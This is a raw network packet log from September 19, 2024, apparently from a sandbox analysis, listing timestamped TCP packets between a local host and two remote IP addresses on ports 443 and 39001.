Sep 19, 2024 02:25:17.737061977 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.737113953 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.737119913 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.737145901 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.737163067 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.749440908 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.749454975 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.749520063 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.749526024 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.749564886 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.749578953 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.821626902 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.821645975 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.821744919 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.821763992 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.821810961 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.822145939 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.822160006 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.822242022 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.822248936 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.822331905 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.822606087 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.822621107 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.822683096 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.822688103 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.822731018 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.822978020 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.822992086 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.823051929 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.823057890 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.823098898 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.823335886 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.823349953 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.823406935 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.823412895 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.823447943 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.823457003 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.825520992 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.825536013 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.825623989 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.825630903 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.825676918 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.826013088 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.826025963 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.826087952 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.826092958 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.826122046 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.826138020 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.838207006 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.838223934 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.838280916 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.838287115 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.838325024 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.838344097 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.910175085 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.910190105 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.910260916 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.910273075 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.910300970 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.910311937 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.910644054 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.910660028 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.910708904 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.910713911 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.910738945 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.910754919 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.911130905 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.911144018 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.911195040 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.911201000 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.911225080 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.911238909 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.911540985 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.911552906 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.911604881 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.911611080 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.911628962 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.911644936 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.911957979 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.911977053 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.912034035 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.912039995 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.912059069 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.912076950 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.914134979 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.914149046 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.914243937 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.914248943 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.914290905 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.914561987 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.914573908 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.914643049 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.914648056 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.914674997 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.914695978 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.926955938 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.926970959 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.927037001 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.927045107 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.927088022 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.003680944 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.003695965 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.003767014 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.003777027 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.003810883 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.003824949 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.004108906 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.004121065 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.004184008 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.004189968 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.004230976 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.004566908 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.004580021 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.004637957 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.004651070 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.004699945 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.004955053 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.004966974 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.005017042 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.005023003 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.005048990 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.005059004 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.005310059 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.005321026 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.005383968 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.005389929 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.005672932 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.005690098 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.005709887 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.005722046 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.005737066 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.005758047 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.006069899 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.006082058 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.006134033 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.006139040 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.006165028 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.006185055 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.015803099 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.015816927 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.015935898 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.015945911 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.015995979 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.091711044 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.091758966 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.091806889 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.091820002 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.091854095 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.091866016 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.091999054 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.092037916 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.092063904 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.092070103 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.092094898 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.092116117 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.092365980 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.092406988 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.092437029 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.092442036 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.092467070 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.092485905 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.092686892 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.092741013 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.092773914 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.092781067 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.092808008 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.092824936 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.093106031 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.093147039 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.093178034 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.093183041 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.093204021 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.093220949 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.093317986 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.093359947 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.093396902 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.093401909 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.093429089 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.093437910 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.094088078 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.094127893 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.094162941 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.094167948 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.094196081 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.094208002 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.104808092 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.104850054 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.104902029 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.104909897 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.104943991 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.104955912 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.180665970 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.180735111 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.180790901 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.180805922 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.180836916 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.180855036 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.180905104 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.180944920 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.180969954 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.180975914 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.181004047 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.181021929 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.181071043 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.181113958 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.181140900 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.181145906 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.181176901 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.181190968 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.181379080 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.181421995 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.181442022 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.181447983 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.181530952 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.181802034 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.181845903 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.181883097 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.181890965 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.181921959 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.181941032 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.182046890 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.182097912 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.182120085 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.182125092 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.182156086 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.182173967 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.182274103 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.182312965 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.182341099 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.182346106 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.182372093 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.182389021 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.193533897 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.193602085 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.193631887 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.193638086 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.193681002 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.269337893 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.269365072 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.269418955 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.269429922 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.269463062 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.269478083 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.269503117 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.269522905 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.269578934 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.269586086 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.269861937 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.269895077 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.269948006 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.269975901 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.269980907 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.270006895 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.270021915 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.270172119 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.270215988 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.270239115 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.270245075 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.270272970 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.270286083 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.270608902 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.270658970 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.270699024 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.270704031 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.270730972 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.270751953 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.270878077 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.270915031 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.270963907 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.270970106 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.271006107 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.271018028 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.271111965 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.271152973 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.271184921 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.271189928 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.271217108 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.271238089 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.283837080 CEST	39001	49711	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:18.283844948 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.283860922 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.283921003 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.283931971 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.283966064 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.283983946 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.325103045 CEST	49711	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:18.358186007 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.358208895 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.358283997 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.358302116 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.358372927 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.358392000 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.358426094 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.358431101 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.358454943 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.358484030 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.358576059 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.358592033 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.358642101 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.358649015 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.358700037 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.358931065 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.358973026 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.359003067 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.359009027 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.359081984 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.359416962 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.359453917 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.359486103 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.359492064 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.359523058 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.359533072 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.359637976 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.359652996 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.359700918 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.359705925 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.359745026 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.360032082 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.360045910 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.360105038 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.360110044 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.360152960 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.372664928 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.372680902 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.372745037 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.372757912 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.372796059 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.417845011 CEST	39001	49711	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:18.418659925 CEST	49711	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:18.423723936 CEST	39001	49711	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:18.423813105 CEST	49711	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:18.447405100 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.447426081 CEST	443	49709	172.67.143.156	192.168.2.5
